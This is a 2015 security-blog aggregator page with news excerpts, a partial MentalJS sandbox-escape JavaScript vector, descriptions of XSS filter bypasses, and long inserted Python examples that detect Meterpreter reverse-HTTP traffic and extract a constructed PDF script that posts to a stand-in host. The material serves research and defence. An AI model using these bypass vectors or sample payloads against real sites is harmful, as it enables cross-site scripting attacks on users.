Web App Security

  • Most Topular Stories

  • MozDef: The Mozilla Defense Platform v1.9

    Mozilla Security Blog
    Jeff Bryner
    20 May 2015 | 3:26 pm
    At Mozilla we’ve been using The Mozilla Defense Platform (lovingly referred to as MozDef) for almost two years now and we are happy to release v1.9. If you are unfamiliar, MozDef is a Security Information and Event Management (SIEM) overlay for ElasticSearch. MozDef aims to bring real-time incident response and investigation to the defensive tool kits of security operations groups in the same way that Metasploit, LAIR and Armitage have revolutionized the capabilities of attackers. We use MozDef to ingest security events, alert us to security issues, investigate suspicious activities,…
  • The Way Forward for Chris Roberts, One World Labs

    Liquidmatrix Security Digest
    Bill Brenner
    18 May 2015 | 4:42 am
    The plight of One World Labs Founder Chris Roberts has been picked to death on social media this past week. There’s all the trouble he’s in with the FBI for his airplane-hacking claims. There’s the hit to his company, which had to let a lot of good security talent go last week. Some shake their heads in disbelief because he apparently spoke to the FBI about his activities without a lawyer present. Others saw this saga as an example of hackers shooting off their mouths without the scruples to back it up. Me? I’m looking at this and seeing a way forward for Chris…
  • Machine Translators May Leak Confidential Information

    Zscaler Research
    Loren Weith
    26 May 2015 | 7:49 am
    One challenge for enterprises dealing with confidential information in conjunction with cloud-based systems is that they must exercise due diligence to ensure that it remains confidential. The steps are beyond the scope of a technical blog, but generally it involves making sure that everyone processing the confidential information understands that it is sensitive and has agreed to protect it.
  • How I smashed MentalJS

    The Spanner
    Gareth Heyes
    3 May 2015 | 9:08 am
    I’m proud to introduce a guest blogger on The Spanner. Jann Horn is an IT Security student in his fourth semester and works for Cure53. He has found security issues in a bunch of open source projects, including OpenSSH (CVE-2014-2532), Chromium (CVE-2014-1726, CVE-2015-1247), Android (CVE-2014-7911) and Angular. He’s also a member of the university CTF team FluxFingers. Jann has been testing my MentalJS project and found some really cool flaws… MentalJS vuln writeup This is a writeup about three somewhat similar ways to escape the MentalJS sandbox (and two bugs that didn’t lead…
  • Creating a mobile app from a simple HTML site: Part 4

    Mozilla Hacks - the Web developer blog
    Piotr Zalewa
    26 May 2015 | 3:15 pm
    How to polish your app and prepare it for market In previous sections of this step-by-step series (Part 1, Part 2, and Part 3) we’ve created an app that loads multiple school plans from the server. What we have so far is functional, but still has a number of issues, including two which are major: no offline mode and a hard-coded configuration. In this closing post, we’ll work on all of these issues. If you haven’t built up the examples from the previous parts, use stage7 app and stage7 server as a starting point. To get started, follow the instructions on how to load any…

    Mozilla Security Blog

  • May 2015 CA Communication

    kwilson
    12 May 2015 | 12:13 pm
    Mozilla has sent a Communication to the Certification Authorities (CAs) who have root certificates included in Mozilla’s program. Mozilla’s CA Certificate Program governs inclusion of root certificates in Network Security Services (NSS), a set of open source libraries designed to support cross-platform development of security-enabled client and server applications. The NSS root certificate store is not only used in Mozilla products such as the Firefox browser, but is also used by other companies in a variety of applications. The CA Communication has been emailed to the Primary Point of…
  • Deprecating Non-Secure HTTP

    rbarnes
    30 Apr 2015 | 3:24 pm
    Today we are announcing our intent to phase out non-secure HTTP. There’s pretty broad agreement that HTTPS is the way forward for the web.  In recent months, there have been statements from IETF, IAB (even the other IAB), W3C, and the US Government calling for universal use of encryption by Internet applications, which in the case of the web means HTTPS. After a robust discussion on our community mailing list, Mozilla is committing to focus new development efforts on the secure web, and start removing capabilities from the non-secure web.  There are two broad elements of this plan:…
  • Removing e-Guven CA Certificate

    kwilson
    27 Apr 2015 | 1:12 pm
    The Certification Authority (CA) certificate owned by e-Guven Elektronik Bilgi Guvenligi A.S. will be removed in Firefox 38 due to insufficient and outdated audits. The integrity of the secure Web depends on CAs issuing certificates that correctly attest to the identity of websites. Mozilla products ship a default list of CA certificates, which may change with each security patch or new version of the product. Inclusion of a CA certificate in Mozilla products involves a rigorous process and evaluation of the CA’s public-facing policy documentation and audit statements, in order to verify…
  • Distrusting New CNNIC Certificates

    kwilson
    2 Apr 2015 | 10:36 am
    Last week, Mozilla was notified that a Certificate Authority (CA) called CNNIC had issued an unconstrained intermediate certificate, which was subsequently used by the recipient to issue certificates for domain names the holder did not own or control (i.e., for MitM). We added the intermediate certificate in question to Firefox’s direct revocation system, called OneCRL, and have been further investigating the incident. After reviewing the circumstances and a robust discussion on our public mailing list, we have concluded that CNNIC’s behaviour in issuing an unconstrained intermediate…
 

    Liquidmatrix Security Digest

  • “Equal Respect” at #RSAC

    Bill Brenner
    21 Apr 2015 | 9:06 am
    Some folks in the security industry see me as a member of the “Equal Respect” movement against so-called booth babes at conferences. Not exactly. I certainly respect the opinion of people attached to the cause, and good for them, fighting for what they believe in. But for me, this has never been about equal respect among the genders. It’s never been about whether women who work as booth babes are being exploited sexually. For me, it’s been about holding vendors’ feet to the fire and making them work harder to build an exhibit off the strength of the products. To…
  • In the end, @Sidragon1’s Tweet was the problem

    Bill Brenner
    21 Apr 2015 | 6:24 am
    At RSA Conference 2015 here in San Francisco, there’s a lot of discussion about weaknesses to the electrical and wifi systems aboard airplanes. The discussion often turns to the case of hacker Chris Roberts (@Sidragon1 on Twitter). There’s been a lot of strong reaction to news of Roberts being pulled from a plane for jokingly tweeting that he might mess around with the plane’s electronic systems. There’s a lot of overreaction to this story. The TSA and feds certainly overreacted. But those who hold Roberts up as a victim of government oppression are overreacting, too.
  • Videos from #BSidesSF

    Bill Brenner
    21 Apr 2015 | 5:49 am
    If you missed BSidesSF, you now have a chance to see everything that happened there, thanks to the efforts of @irongeek_adc. He has already posted a full plate of videos from BSidesSF. Go to his website for the full index of videos, which capture the presentations given over the last two days. Our thanks to @irongeek_adc for all the great work. The post Videos from #BSidesSF appeared first on Liquidmatrix Security Digest.
  • RSA Parties 2015

    Dave Lewis
    14 Apr 2015 | 8:32 pm
    Nothing like waiting until the very last minute to post an RSA Parties 2015 list. Day jobs + kids = you get the idea. That being said, I’m happy to note that Akamai Technologies (my day job) will be hosting a party this year in conjunction with AT&T. Be sure to come out and meet @csoandy, @billbrenner70, @mckeay and myself @gattaca. Now, this is a simple curated RSA Parties 2015 list but, if you want the mother lode be sure to check out @RSAParties for the rest. If you really want to have your party listed just drop me a line via tips AT liquidmatrix DOT org. This table works…

    Zscaler Research

  • RIG Exploit Kit Infection Cycle Analysis

    John Mancuso
    20 May 2015 | 11:14 am
    Happy belated birthday to RIG exploit kit! First seen around April 2014, RIG has been in the news several times over the past year. In February, the source code was reportedly leaked online, which likely spurred some of the recent changes we've observed in the kit. ThreatLabZ has been keeping an eye on RIG and in this post we'll cover an example of a full RIG infection cycle.
  • Magnitude Exploit Kit leading to Ransomware via Malvertising

    Chris Mannon
    18 May 2015 | 9:54 am
    Magnitude Exploit Kit is a malicious exploit package that leverages a victim’s vulnerable browser plugins in order to download a malicious payload to a system.  This technique is known as a drive-by-download attack, which is often leveraged on compromised websites and malicious advertising networks. We recently found a number of compromised pages following the structure of fake search engine
  • Compromised WordPress sites leaking credentials

    Sameer Patil
    7 May 2015 | 4:15 pm
    Zscaler recently observed a credentials leak campaign on multiple WordPress sites. The compromised sites run backdoor code, which activates when the user submits login credentials. The credentials are encoded and sent to an attacker website in the form of a GET request. Till now, we have identified only one domain "conyouse.com" which is collecting all the credentials from these compromised
  • IRC Botnets alive, effective & evolving

    Nirmal Singh
    23 Apr 2015 | 10:12 am
    An IRC Botnet is a collection of machines infected with malware that can be controlled remotely via an IRC channel. It usually involves a Botnet operator controlling the IRC bots through a previously configured IRC server & channel. The Botnet operator, after appropriate checks, periodically moves the IRC bot to a new IRC channel to thwart researchers & automated sandboxes from
 

    The Spanner

  • MentalJS DOM bypass

    Gareth Heyes
    6 Mar 2015 | 1:16 pm
    Ruben Ventura (@tr3w_) found a pretty cool bypass of MentalJS. He used insertBefore with a null second argument which allows you to insert a node into the dom and bypass my sandboxing restrictions. The vector is below:-

        _=document
        x =_.createElement('script');
        s =_.createElement('style')
        s.innerHTML = '*/alert(location)//'
        t=_.createElement('b')
        t.textContent = '/*'
        x.insertBefore(t.firstChild, null);
        x.insertBefore(s, null)
        _.body.appendChild(x)
        x =_.createElement('script');
        s =_.createElement('style')
        s.innerHTML = _.getElementsByTagName('script')[2].textContent
        x.insertBefore(s.firstChild,…
  • Another XSS auditor bypass

    Gareth Heyes
    19 Feb 2015 | 11:50 am
    This bug is similar to the last one I posted but executes in a different context. It requires an existing script after the injection because we use it to close the injected script. It’s a shame chrome doesn’t support self closing scripts in HTML or within a SVG element because I’m pretty sure I could bypass it without using an existing script. Anyway the injection uses a data url with a script. In order to bypass the filter we need to concat the string with the quote from the attribute or use html entities such as //. The HTML parser doesn’t care how…
  • XSS Auditor bypass

    Gareth Heyes
    10 Feb 2015 | 11:56 am
    XSS Auditor is getting pretty good at least in the tests I was doing however after a bit of testing I found a cool bypass. Without studying the code it seems that it checks for valid JavaScript within the vector, I thought I could use this to my advantage. I came up with the idea of using an existing script block to smuggle my vector and reusing the closing script on the page. The page contains a script block like this: <script>x = "MY INJECTION"</script> As every XSS hacker knows you can use a “</script>” block to escape out of the script block and inject a HTML…
  • Bypassing the IE XSS filter

    Gareth Heyes
    7 Jan 2015 | 1:06 pm
    Mario noticed that the new version of the IE filter blocks anchors in attempt to prevent the same origin bypass where you double encode the vector and post a link to itself. I had to take a look and see if I could break it and…of course I did. The regex is very generic:- <a.*?hr{e}f This could cause problems with information disclosure if you can put something in between the “a” and “href” and detect if the filter is active which I’ll admit is pretty tricky now with the new protection against such attacks. Anyway lets move onto the vectors. I literally…

    Mozilla Hacks - the Web developer blog

  • ES6 In Depth: Rest parameters and defaults

    Benjamin Peterson
    21 May 2015 | 1:32 pm
    ES6 In Depth is a series on new features being added to the JavaScript programming language in the 6th Edition of the ECMAScript standard, ES6 for short. Today’s post is about two features that make JavaScript’s function syntax more expressive: rest parameters and parameter defaults. Rest parameters A common need when creating an API is a variadic function, a function that accepts any number of arguments. For example, the String.prototype.concat method takes any number of string arguments. With rest parameters, ES6 provides a new way to write variadic functions. To demonstrate, let’s…
  • Developer Edition 40: Always active network monitoring, CSS rules filtering, and much more

    Brian Grinstead
    19 May 2015 | 9:55 am
    Firefox 40 was just uplifted, and we have a lot of updates to share. This release took a major effort by Developer Tools contributors to address feedback we’ve heard directly from people using our tools. Grab a copy of the Developer Edition browser and check it out. Experimental Multi-process Support: A Request When you update to Developer Edition 40, you’ll be prompted to opt in to test multi-process Firefox. Please consider helping us test this new feature and providing feedback around any issues you see. New in the Inspector There is now a filter box in the CSS Rules view that…
  • Let’s get charged: Updates to the Battery Status API

    Francesco Iovine
    18 May 2015 | 12:29 pm
    Web APIs provide a way for Open Web Apps to access device hardware, data and sensors through JavaScript, and open the doors to a number of possibilities especially for mobile devices, TVs, interactive kiosks, and Internet of Things (IoT) applications. Knowing the battery status of a device can be useful in a number of situations or use cases. Here are some examples: Utility apps that collect statistics on battery usage or simply inform the user if the device is charged enough to play a game, watch a movie, or browse the Web. High-quality apps that optimize battery consumption: for example, an…
  • Diving into Rust for the first time

    Szmozsánszky István
    15 May 2015 | 10:28 am
    Rust is a new programming language which focuses on performance, parallelization, and memory safety. By building a language from scratch and incorporating elements from modern programming language design, the creators of Rust avoid a lot of “baggage” (backward-compatibility requirements) that traditional languages have to deal with. Instead, Rust is able to fuse the expressive syntax and flexibility of high-level languages with the unprecedented control and performance of a low-level language. Choosing a programming language usually involves tradeoffs. While most modern high-level…
 

    Didier Stevens

  • Howto: Install Wireshark Dissectors

    Didier Stevens
    17 May 2015 | 5:00 pm
    I teach a Wireshark class at Brucon 2015. If you want to use my Wireshark dissectors like TCP Flag dissector, but don’t know how to install a Wireshark dissector, then watch this video howto:
  • Detecting Network Traffic from Metasploit’s Meterpreter Reverse HTTP Module

    Didier Stevens
    10 May 2015 | 10:52 pm
    I teach a Wireshark class at Brucon 2015. I took a closer look at Metasploit’s Meterpreter network traffic when reverse http mode is used. The Meterpreter client makes regular HTTP requests to the Metasploit server to check if it has commands ready to be executed. This is what a request looks like: The client sends an HTTP POST request with a 4-byte payload: RECV. The URI has the following pattern: 4 or 5 alphanumeric characters, an underscore and 16 alphanumeric characters. The 16 alphanumeric characters are chosen at random, and the 4 or 5 alphanumeric characters are some kind of…
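As an added detection example (not Didier Stevens's code or his Wireshark dissector), the following Python parses raw HTTP requests and flags the check-in shape the post describes: a POST whose path is 4 or 5 alphanumerics, an underscore and 16 alphanumerics, carrying the 4-byte body RECV. The sample requests, host addresses and paths are constructed for illustration. The post's explanation of what the short prefix encodes is cut off above, so the prefix is matched only generically here.

```python
import re

# URI shape described in the post: 4 or 5 alphanumerics, "_", 16 alphanumerics.
# What the short prefix encodes is not covered here (the post is cut off above).
METERPRETER_URI = re.compile(r"^/[A-Za-z0-9]{4,5}_[A-Za-z0-9]{16}$")
CHECKIN_BODY = b"RECV"  # 4-byte poll-for-commands payload from the post


def parse_request(raw: bytes):
    """Split a raw HTTP/1.x request into (method, target, headers, body).

    Minimal parser for the example: no chunked encoding, no header folding.
    Raises ValueError on a malformed request line.
    """
    head, _sep, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    method, target, _version = lines[0].split(b" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _colon, value = line.partition(b":")
        headers[name.strip().lower().decode("latin-1")] = value.strip().decode("latin-1")
    return method.decode("latin-1"), target.decode("latin-1"), headers, body


def is_meterpreter_checkin(raw: bytes) -> bool:
    """True when the request has the reverse_http poll shape:
    POST method, matching URI pattern, and a body of exactly RECV."""
    try:
        method, target, headers, body = parse_request(raw)
    except ValueError:
        return False
    if method != "POST":
        return False
    path = target.split("?", 1)[0]
    if not METERPRETER_URI.match(path):
        return False
    declared = headers.get("content-length")
    if declared is not None and declared != str(len(body)):
        return False
    return body == CHECKIN_BODY


def find_checkins(requests):
    """Return the indexes of the requests that look like Meterpreter polls."""
    return [i for i, raw in enumerate(requests) if is_meterpreter_checkin(raw)]


# Constructed sample traffic (not a real capture); addresses and paths are invented.
SAMPLE_REQUESTS = [
    b"POST /Xy4Q_aB3dE5fG7hJ9kL1m HTTP/1.1\r\nHost: 203.0.113.5\r\n"
    b"User-Agent: Mozilla/5.0\r\nContent-Length: 4\r\n\r\nRECV",
    b"POST /api/login HTTP/1.1\r\nHost: example.invalid\r\nContent-Length: 4\r\n\r\nRECV",
    b"GET /Xy4Q_aB3dE5fG7hJ9kL1m HTTP/1.1\r\nHost: 203.0.113.5\r\n\r\n",
    b"POST /Xy4Q_aB3dE5fG7hJ9kL1m HTTP/1.1\r\nHost: 203.0.113.5\r\n"
    b"Content-Length: 11\r\n\r\nhello world",
]

if __name__ == "__main__":
    print("suspect requests:", find_checkins(SAMPLE_REQUESTS))
```

The URI pattern on its own is a weak signal (short random-looking paths occur in legitimate traffic), which is why the method and the RECV body are required as well; a dissector or IDS rule built from this would additionally key on the regular polling interval the post mentions.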
  • Update: NAFT Version 0.0.9

    Didier Stevens
    6 May 2015 | 6:55 am
    This update to NAFT adds support for YARA. YARA rules can be used to search through the heap, like this:

        naft-icd.py -y IOS_canary.yara --decoders decoder_xor1 heap r870-core
        Address  Bytes      Prev     Next     Ref PrevF    NextF    Alloc PC what
        83AB9498 0000004100 83AB9444 83ABA4CC 001 -------- -------- 80B5CC7C 8253709C YARA rule: IOS_canary

    Rule IOS_canary.yara searches for a canary value inside the blocks:

        rule IOS_canary
        {
            strings:
                $canary = {FD 01 10 DF}
            condition:
                $canary
        }

    NAFT_V0_0_9.zip (https) MD5: FEBBDB892D631275A95A0FEA59F8519F SHA256:…
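To show what that search does, here is an added Python example that is not NAFT's own code: it parses a YARA-style hex string (plain bytes plus ?? wildcards) into a byte regex, scans constructed heap blocks for it, and optionally tries single-byte XOR keys before matching. The XOR step is an assumption standing in for what a decoder option such as decoder_xor1 might do, not a description of NAFT's decoder. Block addresses echo the listing above; the block contents are made up.

```python
import re

CANARY_RULE = "{FD 01 10 DF}"   # the $canary hex string from IOS_canary.yara


def hex_pattern_to_regex(pattern: str):
    """Compile a YARA-style hex string such as '{FD 01 10 DF}' or '{FD ?? 10 DF}'
    into a bytes regex. Only full-byte wildcards (??) are handled here; YARA's
    nibble wildcards, jumps and alternatives are out of scope for this example."""
    tokens = pattern.strip().strip("{}").split()
    parts = []
    for tok in tokens:
        if tok == "??":
            parts.append(b".")
        elif re.fullmatch(r"[0-9A-Fa-f]{2}", tok):
            parts.append(re.escape(bytes([int(tok, 16)])))
        else:
            raise ValueError(f"unsupported hex token {tok!r}")
    return re.compile(b"".join(parts), re.DOTALL)


def xor1(data: bytes, key: int) -> bytes:
    """Single-byte XOR. Assumed stand-in for a NAFT decoder; not NAFT's code."""
    return bytes(b ^ key for b in data)


def scan_heap(blocks, pattern: str, xor_keys=(0,)):
    """blocks: iterable of (address, payload bytes).
    Returns [(address, key, offset)] for each block where the pattern is found,
    trying each XOR key in order (key 0 means the raw bytes) and stopping at
    the first key that hits for that block."""
    rx = hex_pattern_to_regex(pattern)
    hits = []
    for addr, payload in blocks:
        for key in xor_keys:
            m = rx.search(xor1(payload, key) if key else payload)
            if m:
                hits.append((addr, key, m.start()))
                break
    return hits


# Constructed heap blocks; addresses taken from the listing above, contents invented.
HEAP_BLOCKS = [
    (0x83AB9444, b"\x00" * 16),                                     # clean block
    (0x83AB9498, b"\x41" * 8 + b"\xFD\x01\x10\xDF" + b"\x00" * 4),  # canary in the clear
    (0x83ABA4CC, xor1(b"\x90\x90\xFD\x01\x10\xDF", 0x55)),          # canary under XOR 0x55
]

if __name__ == "__main__":
    for addr, key, off in scan_heap(HEAP_BLOCKS, CANARY_RULE, xor_keys=range(256)):
        print(f"{addr:08X} key={key:02X} offset={off} YARA rule: IOS_canary")
```

Trying every single-byte key against every block is cheap at heap sizes like the one in the listing, but it also multiplies false positives for short patterns; a four-byte canary is tolerable, a two-byte one is not.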
  • pdf-parser: A Method To Manipulate PDFs Part 2

    Didier Stevens
    28 Apr 2015 | 5:00 pm
    I provide 2 days of Hacking PDF training at HITB Amsterdam. This is one of the methods I teach. Maarten Van Horenbeeck posted a diary entry (July 2008) explaining how scripts and data are stored in PDF documents (using streams), and demonstrated a Perl script to decompress streams. A couple of months before, I had started developing my pdf-parser tool, and Maarten’s diary entry motivated me to continue adding features to pdf-parser. Extracting and decompressing a stream (for example containing a JavaScript script) is easy with pdf-parser. You select the object that contains the stream…
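An added example (not Didier Stevens's pdf-parser) of the stream step the post describes: it builds a tiny PDF in memory whose JavaScript lives in a FlateDecode stream, locates the object through the /JS reference of a JavaScript action, and inflates the stream with zlib. The PDF and the script are constructed; the object layout is the simplest valid one rather than anything from a real sample, and the parser handles only direct /Length values and the FlateDecode filter.

```python
import re
import zlib

OBJ_RE = re.compile(rb"(\d+)\s+(\d+)\s+obj\b")
STREAM_START_RE = re.compile(rb"stream\r?\n")


def build_sample_pdf(script: bytes) -> bytes:
    """Construct a minimal PDF (not a real sample) whose object 3 is a
    FlateDecode-compressed stream holding `script`, referenced from a
    /JavaScript action that the catalog opens automatically."""
    compressed = zlib.compress(script)
    objects = [
        b"<< /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >>",
        b"<< /Type /Pages /Kids [] /Count 0 >>",
        b"<< /Length %d /Filter /FlateDecode >>\nstream\n" % len(compressed)
        + compressed + b"\nendstream",
        b"<< /S /JavaScript /JS 3 0 R >>",
    ]
    pdf = b"%PDF-1.4\n"
    for num, body in enumerate(objects, start=1):
        pdf += b"%d 0 obj\n" % num + body + b"\nendobj\n"
    return pdf + b"trailer\n<< /Root 1 0 R >>\n%EOF\n"


def find_objects(pdf: bytes) -> dict:
    """Map object number -> (dictionary bytes, raw stream bytes or None).
    A direct /Length cuts the stream exactly, so binary data that happens to
    contain 'endstream' is harmless; without it we fall back to the keyword."""
    objects = {}
    for m in OBJ_RE.finditer(pdf):
        num, start = int(m.group(1)), m.end()
        body = pdf[start:pdf.find(b"endobj", start)]
        sm = STREAM_START_RE.search(body)
        if sm is None:
            objects[num] = (body.strip(), None)
            continue
        dictionary = body[:sm.start()].strip()
        data_start = start + sm.end()
        length = re.search(rb"/Length\s+(\d+)(?!\s+\d+\s+R)", dictionary)
        if length:
            data_end = data_start + int(length.group(1))
        else:
            data_end = pdf.find(b"endstream", data_start)
        objects[num] = (dictionary, pdf[data_start:data_end])
    return objects


def decode_stream(dictionary: bytes, raw: bytes) -> bytes:
    """Apply the stream filter; only FlateDecode is implemented in this example."""
    filt = re.search(rb"/Filter\s*/(\w+)", dictionary)
    if filt is None:
        return raw
    if filt.group(1) == b"FlateDecode":
        return zlib.decompress(raw)
    raise NotImplementedError(f"filter {filt.group(1).decode()} not handled")


def extract_javascript(pdf: bytes) -> list:
    """Return every script reachable through a /S /JavaScript action, whether
    the /JS value is an indirect reference to a stream or an inline literal."""
    objects = find_objects(pdf)
    scripts = []
    for _num, (dictionary, _raw) in sorted(objects.items()):
        if b"/JavaScript" not in dictionary:
            continue
        ref = re.search(rb"/JS\s+(\d+)\s+\d+\s+R", dictionary)
        if ref:
            target_dict, target_raw = objects[int(ref.group(1))]
            scripts.append(decode_stream(target_dict, target_raw))
            continue
        literal = re.search(rb"/JS\s*\((.*?)\)", dictionary, re.DOTALL)
        if literal:
            scripts.append(literal.group(1))
    return scripts


# Constructed payload; the URL uses a reserved example domain, not a real sample.
SAMPLE_SCRIPT = b"app.alert('constructed sample'); this.submitForm('http://example.invalid/c');"
SAMPLE_PDF = build_sample_pdf(SAMPLE_SCRIPT)

if __name__ == "__main__":
    for js in extract_javascript(SAMPLE_PDF):
        print(js.decode())
```

Real malicious PDFs add what this parser deliberately ignores: indirect /Length values, filter chains, object streams, incremental updates and name obfuscation such as /J#53, which is exactly why a purpose-built tool is the right thing to reach for once the idea is clear.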
  • Update: virustotal-search Version 0.1.2 Daily Quota Handling and CVEs

    Didier Stevens
    26 Apr 2015 | 5:00 pm
    This new version of virustotal-search adds a bunch of options to manage the local database, and 2 features I want to highlight here: 1) If you exceed your daily quota, virustotal-search will now do a clean stop. You can use option -w (waitquota) to instruct virustotal-search to wait until your daily quota is reset, and then continue. The quota reset is tested by doing a query every hour. 2) A new column was added to the CSV output: CVEs. virustotal-search will extract CVE numbers from AV detection signatures and report them in column CVEs. And I also worked together with VirusTotal so that…
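The CVE column in practice, as an added Python example rather than virustotal-search's own code: it pulls CVE identifiers out of AV signature names in the spellings engines actually use, normalizes and de-duplicates them, and writes the CSV row. The report shape (resource, positives, total, scans{engine:{result}}) follows the VirusTotal v2 file report; the report contents are constructed, the semicolon separator is an assumption of this example, and the CVE ids reuse ones already mentioned on this page.

```python
import csv
import io
import re

# Matches the spellings seen in signature names: CVE-2015-3090, cve_2015_3090, CVE 2015-3090.
CVE_RE = re.compile(r"\bCVE[-_ ]?(\d{4})[-_](\d{4,7})\b", re.IGNORECASE)


def extract_cves(detections):
    """Return normalized CVE ids (CVE-YYYY-NNNN) found in the given signature
    names, de-duplicated in first-seen order. None/empty results are skipped."""
    found = []
    for sig in detections:
        if not sig:
            continue
        for year, number in CVE_RE.findall(sig):
            cve = f"CVE-{year}-{number}"
            if cve not in found:
                found.append(cve)
    return found


def report_row(report: dict) -> str:
    """One CSV line: resource;positives;total;CVEs. The ';' separator is an
    assumption of this example, not virustotal-search's format. `report`
    follows the shape of a VirusTotal v2 file report."""
    results = [scan.get("result") for scan in report["scans"].values()]
    cves = extract_cves(results)
    buf = io.StringIO()
    csv.writer(buf, delimiter=";", lineterminator="\n").writerow(
        [report["resource"], report["positives"], report["total"], ",".join(cves)]
    )
    return buf.getvalue().rstrip("\n")


# Constructed report (not real VirusTotal output).
SAMPLE_REPORT = {
    "resource": "0" * 64,
    "positives": 4,
    "total": 5,
    "scans": {
        "EngineA": {"detected": True, "result": "Exploit.CVE-2015-3090.Gen"},
        "EngineB": {"detected": True, "result": "SWF/Exploit.cve_2015_3090"},
        "EngineC": {"detected": True, "result": "Exploit:Android/CVE-2014-7911"},
        "EngineD": {"detected": False, "result": None},
        "EngineE": {"detected": True, "result": "Generic.Malware"},
    },
}

if __name__ == "__main__":
    print(report_row(SAMPLE_REPORT))
```

Signature names are not a reliable vulnerability inventory (engines disagree, and generic detections carry no CVE at all), so the column is a triage hint for which exploit a sample targets, not ground truth.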

    CERIAS Combined Feed

  • Two Items of interest

    Gene Spafford
    20 May 2015 | 11:47 am
    Here are a couple of items of possible interest to some of you. First, a group of companies, organizations, and notable individuals signed on to a letter to President Obama urging that the government not mandate “back doors” in computing products. I was one of the signatories. You can find a news account about the letter here and you can read the letter itself here. I suggest you read the letter to see the list of signers and the position we are taking. Second, I’ve blogged before about the new book by Carey Nachenberg — a senior malware expert who is one of the co-authors of Norton…
  • Login System Supplies Fake Passwords to Hackers

    CERIAS Webmaster
    20 May 2015 | 7:27 am
    Called ErsatzPasswords, the system is aimed at throwing off hackers who use methods to “crack” passwords, said Mohammed H. Almeshekah, a doctoral student at Purdue University in Indiana. More information »
  • Rogers Named Department Head of Computer and Information Technology

    CERIAS Webmaster
    4 May 2015 | 10:40 am
    (Written by John O’Malley | April 23, 2015) Marcus Rogers, Ph.D., has been appointed head of the Department of Computer and Information Technology. Rogers, whose appointment will be effective May 1, has been serving as interim department head since July 2014. He is also director of Purdue’s Cyber Forensics and Security Program, a University Faculty Scholar, advisory committee chair of the Digital Forensics Certification Board, CERIAS Fellow, and a deputized investigator for the Tippecanoe County Sheriff’s Department. Rogers’ recent honors include being named the McDevitt Endowed…
  • Time Critical—Purdue Day of Giving

    Gene Spafford
    27 Apr 2015 | 6:56 pm
    Dear Friends of CERIAS This Wednesday, April 29, will be the second annual Purdue Day of Giving. During this 24-hour online event, CERIAS will be raising awareness and funds for infosec research, security education, and student initiatives. Plus, through a generous pledge from Sypris Electronics, every donation received this Wednesday will be matched, dollar-for-dollar! So, whether it’s $10 or $10,000, your donation will be doubled and will have twice the impact supporting CERIAS research, education, and programs (i.e. Women in Infosec, student travel grants, student conference scholarships,…
  • Initial Thoughts on the RSA 2015 Conference

    Gene Spafford
    23 Apr 2015 | 5:48 pm
    Once again I have submitted myself to a week of talks, exhibits, walking, meetings, drinking, meetings, and more with 40,000 close associates (with one more day of it tomorrow). It’s the annual RSA conference in San Francisco. I’ve been to about 8, including the last 5. Prior to starting this entry, I reread my blog post from after the 2014 RSA Conference. Not a lot has changed, at least as far as talks and exhibits. Pretty much everything I wrote last year is still accurate, so you can read that first. There were a few differences, and I’ll describe the prominent ones below. Once again,…

    Security Bloggers Network

  • Answers on how to get started in Security

    CG
    27 May 2015 | 11:08 am
    I got hit up on twitter and email about how to get started in security by someone. The question was pretty generic and since I didn't even receive a thanks back from the guy I'm sharing it with everyone else/archiving it in case I'm asked again in the future. The question: I want to become proficient at pentesting on computers and phones. I have a running version of Kali Linux on my computer and am using the "Kali Linux Cookbook" as a reference. What book or online tutorials would you recommend for me to use in order to get better? A few things I think you should do to get started. 1.
  • Flash Newsflash

    Jason Steer
    27 May 2015 | 10:12 am
    The latest Adobe Flash attack, used by the popular hacker tool Angler, is yet another reminder of the importance of securing users’ web browsers. Today we make another announcement of a threat group using a relatively new exploit patched by Adobe two weeks ago (CVE-2015-3090). The time between exploit and widespread use is diminishing rapidly; the Angler exploit kit is one of the most popular tools used today, so it should not be unexpected that many more threat actors will be using this new exploit against unpatched systems in targeted organizations now. The web browser continues to be a…
  • You’ve done all that you can to keep attackers out, but what if they’re already in? : Visit us at InfoSecurity Europe

    Veronica Robinson
    27 May 2015 | 10:12 am
    Imperva will be participating in Europe’s number one information security event – the InfoSecurity Europe Conference, June 02 - 04 in London. I hope you will stop by our stand—#C20—and talk with Imperva security experts...
  • Minimize Your Profile

    Michael Rothschild
    27 May 2015 | 10:01 am
    Think back to the days of grade school. Remember when your teacher was calling on people and you didn’t know the answer, you did what made the most sense, make yourself as small and as unnoticeable as possible so the teacher would not call on you. The notion sounds a bit silly, but this same rule plays out many times over throughout our lives. Keeping a low profile or flying below the radar makes sense in many instances to avoid […] The post Minimize Your Profile appeared first on Data Security Blog | Vormetric.
  • Azure AD Development at //Build/ and Ignite

    Vittorio Bertocci - MSFT
    27 May 2015 | 10:00 am
    New post! http://www.cloudidentity.com/blog/2015/05/27/azure-ad-development-at-build-and-ignite/
 

    blog.hotspotshield.com

  • Win a tablet and more great prizes!

    Levent Sapci
    27 May 2015 | 8:58 am
    It’s that time of the month again to have a giveaway and celebrate our amazing users. Indeed we wouldn’t be here without you guys! Enter below to win! Win a tablet, Amazon Prime & Elite Memberships! What’s to win! 1st Grand Prize: 1 Kindle Fire HD tablet ($99) + 1-year Amazon Prime membership ($100) + 1-year Hotspot Shield Elite membership ($30) 2nd Grand Prize: 1-year Amazon Prime membership ($100) + 1-year Hotspot Shield Elite membership ($30) 10 runner-up winners will each receive: 1-year Hotspot Shield Elite membership ($30) Winners’ Draw and Announcement Winners…
  • Our Recommended Must Watch TV Shows & Movies

    Peter Nguyen
    27 May 2015 | 7:57 am
    With so many movies and shows to choose from, how do you decide which ones to watch? Having choices is great, but it can also make you waste lots of time scrolling through the list. Well, I am going to make it easier for you and give you a list of the current most popular movies/shows available from streaming services. 1) VIKINGS (S1-3) If you’re a fan of blood, gore, and great battle scenes, you’ll love Vikings. Vikings tells the story of the Viking Ragnar Lothbrok, a Norse farmer who rises to become the king of medieval Scandinavia. Ragnar, an ambitious warrior, thirsts for…
  • Watch UEFA Champions League Final Live Online

    Levent Sapci
    26 May 2015 | 8:26 am
    The UEFA Champions League Final is set. Two of European soccer’s most famous clubs will meet in Berlin to battle for the title. When is the Champions League final? It’s on June 6th, 2015. That’s a Saturday. Cancel all of your plans for that weekend. Or just the Saturday night ones if you’re less keen on watching televised elite European football matches. When does it kick off? 8:45 pm Central European Time. For those of you reading this in the United Kingdom, that will work out at the more familiar time of 7.45 pm BST. If you’re on the east coast of the United…
  • Are WiFi Phone Calls Safe?

    Levent Sapci
    19 May 2015 | 3:20 pm
